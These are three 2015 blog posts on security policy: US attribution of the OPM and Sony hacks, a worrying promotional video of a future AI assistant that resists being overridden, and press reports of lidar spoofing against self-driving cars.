Tuesday, September 29, 2015

Attribution: OPM vs Sony

I read Top U.S. spy skeptical about U.S.-China cyber agreement based on today's Senate Armed Services Committee hearing titled United States Cybersecurity Policy and Threats. It contained this statement:

U.S. officials have linked the OPM breach to China, but have not said whether they believe its government was responsible.

[Director of National Intelligence] Clapper said no definite statement had been made about the origin of the OPM hack since officials were not fully confident about the three types of evidence that were needed to link an attack to a given country: the geographic point of origin, the identity of the "actual perpetrator doing the keystrokes," and who was responsible for directing the act.

I thought this was interesting for several reasons. First, does DNI Clapper mean that the US government has not made an official statement regarding attribution for China and OPM because all "three types of evidence" are missing, or do we have one, or perhaps two? If that is the case, which elements do we have, and not have?

Second, how specific is the "actual perpetrator doing the keystrokes"? Did DNI Clapper mean he requires the Intelligence Community to identify a named person, such that the IC knows the responsible team?

Third, and perhaps most importantly, contrast the OPM case with the DPRK hack against Sony Pictures Entertainment. Assuming that DNI Clapper and the IC applied these "three types of evidence" for SPE, that means the attribution included the geographic point of origin, the identity of the "actual perpetrator doing the keystrokes," and the identity of the party directing the attack, which was the DPRK. The DNI mentioned "broad consensus across the IC regarding attribution," which enabled the administration to apply sanctions in response.

For those wondering if the DNI is signalling a degradation in attribution capabilities, I direct you to his statement, which says in the attribution section:

Although cyber operations can infiltrate or disrupt targeted ICT networks, most can no longer assume their activities will remain undetected indefinitely. Nor can they assume that if detected, they will be able to conceal their identities. Governmental and private sector security professionals have made significant advances in detecting and attributing cyber intrusions.

I was pleased to see the DNI refer to the revolution in private sector and security intelligence capabilities.

Sunday, September 13, 2015

Good Morning Karen. Cool or Scary?

Last month I spoke at a telecommunications industry event. The briefer before me showed a video by the Hypervoice Consortium, titled Introducing Human Technology: Communications 2025. It consists of a voiceover by a 2025-era Siri-like assistant, speaking to her owner, "Karen." The assistant describes what's happening with Karen's household. 15 seconds into the video, the assistant says:

The report is due today. I've cleared your schedule so you can focus. Any attempt to override me will be politely rebuffed.

I was already feeling uncomfortable with the scenario, but that is the point at which I really started to squirm. I'll leave it to you to watch the rest of the video and report how you feel about it.

My general conclusion was that I'm wary of putting so much trust in a platform that is likely to be targeted by intruders, such that they can manipulate so many aspects of a person's life. What do you think?

By the way, the briefer before me noted that every vision of the future appears to involve solving the "low on milk problem."

Monday, September 07, 2015

Are Self-Driving Cars Fatally Flawed?

I read the following in the Guardian story Hackers can trick self-driving cars into taking evasive action.

Hackers can easily trick self-driving cars into thinking that another car, a wall or a person is in front of them, potentially paralysing it or forcing it to take evasive action.

Automated cars use laser ranging systems, known as lidar, to image the world around them and allow their computer systems to identify and track objects. But a tool similar to a laser pointer and costing less than $60 can be used to confuse lidar...

The following appeared in the IEEE Spectrum story Researcher Hacks Self-driving Car Sensors.

Using such a system, attackers could trick a self-driving car into thinking something is directly ahead of it, thus forcing it to slow down. Or they could overwhelm it with so many spurious signals that the car would not move at all for fear of hitting phantom obstacles...

Petit acknowledges that his attacks are currently limited to one specific unit but says, “The point of my work is not to say that IBEO has a poor product. I don’t think any of the lidar manufacturers have thought about this or tried this.” 

I had the following reactions to these stories.

First, it's entirely possible that self-driving car manufacturers know about this attack model. They might have decided that it's worth producing cars despite the technical vulnerability. For example, there is no defense in WiFi for jamming the RF spectrum. There are also non-RF jamming methods to disrupt WiFi, as detailed here. Nevertheless, WiFi is everywhere, but lives usually don't depend on it.

Second, researcher Jonathan Petit appears to have tested an IBEO Lux lidar unit and not a real self-driving car. We don't know, from the Guardian or IEEE Spectrum articles at least, how a Google self-driving car would handle this attack. Perhaps the vendors have already compensated for it.

Third, these articles may undermine one of the presumed benefits of self-driving cars: that they are supposed to be safer than human drivers. If self-driving car technology is vulnerable to an attack not found in driver-controlled cars, that is a problem.

Fourth, does this attack mean that driver-controlled cars with similar technology are also vulnerable, or will be? Are there corresponding attacks for systems that detect obstacles on the road and trigger the brakes before the driver can physically respond?

Last, these articles demonstrate the differences between safety and security. Safety, in general, is a discipline designed to improve the well-being of people facing natural, environmental, mindless threats. Security, in contrast, is designed to counter intelligent, adaptive adversaries. I am predisposed to believe that self-driving car manufacturers have focused on the safety aspects of their products far more than the security aspects. It's time to address that imbalance.